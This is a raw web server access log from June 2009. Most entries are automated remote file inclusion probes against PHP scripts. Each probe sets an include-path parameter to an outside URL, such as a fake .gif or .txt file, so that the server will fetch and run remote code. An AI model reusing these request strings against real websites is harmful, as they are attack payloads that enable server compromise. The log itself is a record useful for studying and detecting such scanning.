75.125.245.26 - - [04/Jun/2009:00:16:06 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:16:20 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:00:16:20 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
75.125.245.26 - - [04/Jun/2009:00:16:41 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.125.245.26 - - [04/Jun/2009:00:16:41 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
75.125.245.26 - - [04/Jun/2009:00:16:41 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
122.117.128.22 - - [04/Jun/2009:00:17:07 -0400] "GET /logs/access_log.Q109052700//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.maliodkrywcy.pl///images/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
75.125.245.26 - - [04/Jun/2009:00:17:10 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
71.131.191.78 - - [04/Jun/2009:00:17:15 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
76.164.212.18 - - [04/Jun/2009:00:17:26 -0400] "GET /?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
76.164.212.18 - - [04/Jun/2009:00:17:26 -0400] "GET /logs/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
76.164.212.18 - - [04/Jun/2009:00:17:26 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
